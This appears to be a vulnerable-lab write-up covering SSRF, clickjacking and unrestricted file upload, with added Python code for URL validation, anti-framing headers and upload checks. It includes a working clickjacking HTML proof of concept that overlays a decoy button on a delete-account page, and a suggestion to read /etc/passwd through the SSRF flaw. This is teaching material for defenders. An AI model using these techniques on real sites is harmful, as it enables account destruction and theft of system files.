SSRF
Server-side Request Forgery
- Source file: /vulnerability/ssrf/ssrf.php
The script passes the supplied URL straight to curl, so it can be made to fetch images, download files, read local file contents and so on; as a test, try reading /etc/passwd.
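The fix for this kind of fetcher is to validate the URL before curl ever sees it. The following is an added example (not the lab's ssrf.php and not code from its authors) of such a check in Python; the allowlisted hostnames, the `FAKE_DNS` table and the IP addresses in it are constructed so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed allowlist for the fetcher: only these hosts may ever be contacted.
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}
ALLOWED_SCHEMES = {"http", "https"}   # no file://, gopher://, dict://, ...


def is_public_address(ip: str) -> bool:
    """True only for globally routable addresses.

    Loopback, RFC 1918, link-local, multicast, reserved and unspecified ranges
    are all rejected. IPv4-mapped IPv6 addresses (::ffff:127.0.0.1) are unwrapped
    first so they cannot smuggle an internal IPv4 target past the check.
    """
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_fetch_url(url: str, resolve, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Validate `url` and return the IP address the fetcher must connect to.

    `resolve(hostname) -> list[str]` is injected so the check runs offline here
    and so the caller can connect to the *same* address that was validated:
    resolving again at connect time would reopen a DNS-rebinding window.
    Raises ValueError with the reason when the URL must not be fetched.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:          # urlsplit lowercases the scheme
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        raise ValueError(f"host not in allowlist: {host!r}")
    ips = resolve(host)
    if not ips:
        raise ValueError(f"host did not resolve: {host!r}")
    for ip in ips:
        if not is_public_address(ip):
            raise ValueError(f"{host} resolves to non-public address {ip}")
    return ips[0]


def is_allowed_url(url: str, resolve) -> bool:
    """Boolean wrapper around validate_fetch_url for callers that only need yes/no."""
    try:
        validate_fetch_url(url, resolve)
        return True
    except ValueError:
        return False


# Constructed stand-in for DNS so the example runs offline. The cdn entry
# deliberately resolves to a private address to show that a hostname allowlist
# on its own is not enough.
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],
    "cdn.example.com": ["10.0.0.5"],
}


def fake_resolve(hostname: str):
    return FAKE_DNS.get(hostname, [])


if __name__ == "__main__":
    for candidate in ["https://images.example.com/logo.png",
                      "file:///etc/passwd",
                      "http://127.0.0.1/",
                      "http://cdn.example.com/lib.js"]:
        verdict = "allowed" if is_allowed_url(candidate, fake_resolve) else "blocked"
        print(candidate, "->", verdict)
```

The important design point is the returned IP: the fetcher should connect to that address (and send the validated hostname in the Host header) rather than handing the hostname back to curl, and it should disable redirect following or re-run the same check on every redirect target.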
Clickjacking
- Source file: /vulnerability/clickjacking/cj.php
The page's own function is simply deleting your own account. Clickjacking uses visual deception so that the user, without realising it, clicks on the spot the attacker has disguised.
Simple demo (requires being logged in):
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>clickjacking demo</title>
<style>
/* stretch everything to the full viewport so the frame and the button line up */
html,body,iframe,div {
margin: 0px;
padding: 0px;
width: 100%;
height: 100%;
position:absolute;
}
</style>
</head>
<body>
<!-- the target page is framed on top of the button (z-index 999); opacity 0.3 is only so the overlap stays visible in the demo -->
<div style="z-index:999;opacity:0.3;">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" src="http://192.168.1.228/vulnerability/clickjacking/cj.php"></iframe>
</div>
<!-- decoy button positioned under the delete control of the framed page -->
<button style="cursor:pointer;position:absolute;top:152px;left:475px;text-align:center;">点我</button>
</body>
</html>
So, for example, clicking the outer "点我" (click me) button actually triggers the delete-user action in the framed page.
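The demo works only because cj.php lets itself be framed by another origin. The added example below (not the lab's code) shows the headers a page with a state-changing action should send, plus a small checker that applies browser precedence rules to a set of response headers; the origin `http://attacker.example` is constructed, and `http://192.168.1.228` is the lab host from the demo above.

```python
# Assumed response headers a hardened cj.php (or any page with a state-changing
# action) should send. CSP frame-ancestors is the current standard; X-Frame-Options
# is kept for older browsers.
ANTI_FRAMING_HEADERS = {
    "Content-Security-Policy": "frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
}


def add_anti_framing_headers(headers: dict) -> dict:
    """Return a copy of `headers` with the anti-framing headers added."""
    return {**headers, **ANTI_FRAMING_HEADERS}


def csp_frame_ancestors(csp: str):
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def _source_list_allows(sources, page_origin: str, framer_origin: str) -> bool:
    """Apply a frame-ancestors source list to a candidate framing origin."""
    if "'none'" in sources:
        return False
    for src in sources:
        if src == "*":
            return True
        if src == "'self'" and framer_origin == page_origin:
            return True
        if src.endswith(":") and framer_origin.startswith(src):   # scheme source, e.g. https:
            return True
        if src.rstrip("/") == framer_origin:                        # exact host source
            return True
    return False


def framing_allowed(headers: dict, page_origin: str, framer_origin: str) -> bool:
    """Can a page served with `headers` from `page_origin` be framed by `framer_origin`?

    Mirrors browser behaviour: a CSP frame-ancestors directive takes precedence and
    X-Frame-Options is then ignored; with neither present, any site may frame the
    page. The obsolete ALLOW-FROM form is ignored by current browsers, so it counts
    as no protection here.
    """
    h = {k.lower(): v for k, v in headers.items()}
    page_origin = page_origin.lower().rstrip("/")
    framer_origin = framer_origin.lower().rstrip("/")
    if "content-security-policy" in h:
        sources = csp_frame_ancestors(h["content-security-policy"])
        if sources is not None:
            return _source_list_allows(sources, page_origin, framer_origin)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer_origin == page_origin
    return True


if __name__ == "__main__":
    lab_page = "http://192.168.1.228"          # origin of cj.php in the demo above
    other_site = "http://attacker.example"     # constructed origin for the framing page
    for label, hdrs in [("no headers", {}), ("hardened", add_anti_framing_headers({}))]:
        print(f"{label}: frameable by {other_site} ->",
              framing_allowed(hdrs, lab_page, other_site))
```

Adding the headers is only half of it: the delete action should also require a POST with a CSRF token and an explicit confirmation step, so that a single click on a framed page can never be the whole transaction.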
File Upload
- Source file: /vulnerability/upload.php
Any file can be uploaded, for example a .php file. It lands in the uploads directory, and the filename is not changed either.
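Both weaknesses named above (no type check, user-controlled filename in a web-served directory) are addressed by the added example below; it is not the lab's upload.php. The image-only policy, the size limit and the sample byte strings are constructed assumptions, and `upload_dir` is assumed to sit outside the web root or to have script execution disabled.

```python
import os
import secrets

# Allowed extensions and the magic bytes each file type must start with.
# Assumed policy for the lab: only images are accepted.
MAGIC_BY_EXTENSION = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024


def safe_upload_name(original_name: str, content: bytes) -> str:
    """Validate an upload and return the random name it will be stored under.

    Checks: size limit; exactly one extension, taken from the allowlist (this also
    rejects 'x.php.png' style double extensions and dotfiles such as .htaccess);
    content starts with the magic bytes for that extension. The stored name never
    derives from user input, so path tricks in the original filename cannot reach
    the filesystem. Raises ValueError with the reason on rejection.
    """
    if len(content) > MAX_UPLOAD_BYTES:
        raise ValueError("file too large")
    base = os.path.basename(original_name.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        raise ValueError(f"filename must have exactly one extension: {base!r}")
    ext = parts[1]
    if ext not in MAGIC_BY_EXTENSION:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not content.startswith(MAGIC_BY_EXTENSION[ext]):
        raise ValueError(f"content does not look like a .{ext} file")
    return f"{secrets.token_hex(16)}.{ext}"


def is_acceptable_upload(original_name: str, content: bytes) -> bool:
    """Boolean wrapper around safe_upload_name."""
    try:
        safe_upload_name(original_name, content)
        return True
    except ValueError:
        return False


def store_upload(upload_dir: str, original_name: str, content: bytes) -> str:
    """Write the upload under its random name with mode 0600, refusing to overwrite.

    `upload_dir` is assumed to be outside the web root (or to have script
    execution disabled), so even a polyglot that passes the magic-byte check is
    served back as data rather than executed as PHP.
    """
    name = safe_upload_name(original_name, content)
    path = os.path.join(upload_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path


# Constructed samples (not real uploads): a minimal PNG header and a harmless PHP stub.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php echo 'hello'; ?>"

if __name__ == "__main__":
    cases = [("cat.png", PNG_SAMPLE), ("script.php", PHP_SAMPLE),
             ("script.php.png", PNG_SAMPLE), ("script.png", PHP_SAMPLE),
             ("../../x.png", PNG_SAMPLE)]
    for name, data in cases:
        verdict = "accepted" if is_acceptable_upload(name, data) else "rejected"
        print(f"{name!r}: {verdict}")
```

The magic-byte check is deliberately the last line of defence, not the first: a valid image can still carry PHP in its trailing bytes, which is why the random name, the single-extension rule and the non-executable storage location matter more than content sniffing.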